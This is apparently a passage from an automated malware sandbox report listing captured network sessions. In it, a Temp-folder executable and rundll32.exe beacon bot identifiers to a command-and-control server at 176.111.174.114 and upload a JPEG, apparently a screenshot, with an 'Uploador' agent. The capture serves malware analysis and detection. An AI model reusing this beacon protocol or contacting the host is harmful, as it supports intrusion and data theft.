                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          405176.111.174.11480192.168.2.449992C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:15.470993996 CEST11388INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          406192.168.2.449993176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:15.675512075 CEST11389OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          407176.111.174.11480192.168.2.449993C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:15.775217056 CEST11389INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          408192.168.2.449994176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:15.991588116 CEST11390OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          409176.111.174.11480192.168.2.449994C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:16.090842009 CEST11390INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          41176.111.174.11480192.168.2.449768C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:17.078310013 CEST4541INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          410192.168.2.449995176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:16.307410955 CEST11391OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          411176.111.174.11480192.168.2.449995C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:16.412863970 CEST11391INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          412192.168.2.449996176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:16.564857006 CEST11405OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:16.660514116 CEST11408OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:16.660942078 CEST11411OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:16.660965919 CEST11413OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:16.661150932 CEST11416OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:16.661580086 CEST11419OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:16.661756039 CEST11421OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:16.661923885 CEST11427OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:16.662167072 CEST11430OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:16.662497044 CEST11432OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 23:00:16.757378101 CEST11438OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          413192.168.2.449997176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
